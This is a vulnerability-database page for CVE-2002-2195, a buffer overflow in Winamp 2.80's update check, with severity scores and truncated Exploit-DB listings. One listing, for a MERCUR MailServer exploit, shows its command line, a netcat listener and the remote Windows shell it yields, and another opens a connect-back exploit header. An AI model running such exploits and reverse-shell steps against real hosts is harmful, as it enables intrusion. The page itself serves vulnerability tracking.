CVE-2002-2195
published 2002-12-31CVE-2002-2195: Buffer overflow in the version update check for Winamp 2.80 and earlier allows remote attackers who can spoof www.winamp.com to execute arbitrary code via a…
PriorityP427medium5CVSS 2.0
AVNACLAuNCNIPAN
EXPLOIT
EPSS
4.69%
90.7th percentile
Buffer overflow in the version update check for Winamp 2.80 and earlier allows remote attackers who can spoof www.winamp.com to execute arbitrary code via a long server response.
Affected
15 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| nullsoft | winamp | — | — |
| nullsoft | winamp | — | — |
| nullsoft | winamp | — | — |
| nullsoft | winamp | — | — |
| nullsoft | winamp | — | — |
| nullsoft | winamp | — | — |
| nullsoft | winamp | — | — |
| nullsoft | winamp | — | — |
| nullsoft | winamp | — | — |
| nullsoft | winamp | — | — |
| nullsoft | winamp | — | — |
| nullsoft | winamp | — | — |
| nullsoft | winamp | — | — |
| nullsoft | winamp | — | — |
| nullsoft | winamp | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
3.3/4.0/4.2 MERCUR MailServer - Control-Service Buffer Overflow
exploitdb·2002-07-16
CVE-2002-1073 3.3/4.0/4.2 MERCUR MailServer - Control-Service Buffer Overflow
3.3/4.0/4.2 MERCUR MailServer - Control-Service Buffer Overflow
---
// source: https://www.securityfocus.com/bid/5261/info
// MERCUR Mailserver is prone to a remotely exploitable buffer overflow condition. The condition is due to insufficient bounds checking in the Control-Service component, which listens on TCP port 32000 by default. It is possible to corrupt process memory by supplying an overly long username/password. Attackers may exploit this condition to execute arbitrary instructions with the privileges of the mailserver.
/*
mercrexp.c (7/16/2002)
# ./mercrexp 192.168.0.2 32000 192.168.1.2 3333
# nc -l -p 3333
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.
E:\WINNT\system32>
2c79cbe14ac7d0b8472d3f129fa1df55 (c79cbe14ac7d0b8472d3f129fa1df55@
Exploit-DB
Microsoft IIS 4.0/5.0 - SMTP Service Encapsulated SMTP Address (MS99-027)
exploitdb·2002-07-12
CVE-2002-1790 Microsoft IIS 4.0/5.0 - SMTP Service Encapsulated SMTP Address (MS99-027)
Microsoft IIS 4.0/5.0 - SMTP Service Encapsulated SMTP Address (MS99-027)
---
source: https://www.securityfocus.com/bid/5213/info
Microsoft Exchange 5.5 and the SMTP (Simple Mail Transfer Protocol) service included with IIS (Internet Information Services) 4.0 and 5.0 are vulnerable to an encapsulated SMTP address vulnerability.
The vulnerability was originally announced in Microsoft Security Bulletin MS99-027 and reported to affect Exchange Server 5.5. Microsoft released a patch to fix the vulnerability for Exchange Server 5.5 only. It has been recently reported that this vulnerability also affects the SMTP service included with Microsoft IIS 4.0 and 5.0. There exists no patch for the IIS SMTP service.
220 test-mailer Microsoft ESMTP MAIL Service, Version: 5.0.2195.4905 ready
at
Tue,
Exploit-DB
Nullsoft Winamp 2.80 - Automatic Update Check Buffer Overflow
exploitdb·2002-07-03
CVE-2002-2195 Nullsoft Winamp 2.80 - Automatic Update Check Buffer Overflow
Nullsoft Winamp 2.80 - Automatic Update Check Buffer Overflow
---
// source: https://www.securityfocus.com/bid/5170/info
Nullsoft Winamp is a media player for Microsoft Windows supporting MP3 and other filetypes.
Winamp is vulnerable to a buffer overflow condition when checking for updated versions. A malicious server located at www.winamp.com may return a malicious response. Exploitation may result in the execution of arbitrary code as the Winamp process.
It may be possible to exploit this vulnerability if an attacker can control the resolution of the www.winamp.com domain, possibly through DNS cache poisoning.
/*
wampexp.c
July 3rd, 2002
Winamp 2.80a and all previous remote exploit (connect-back styles)
winamp has an option, enabled by default, which checks for the latest
ve
No writeups or analysis indexed.
2002-12-31
Published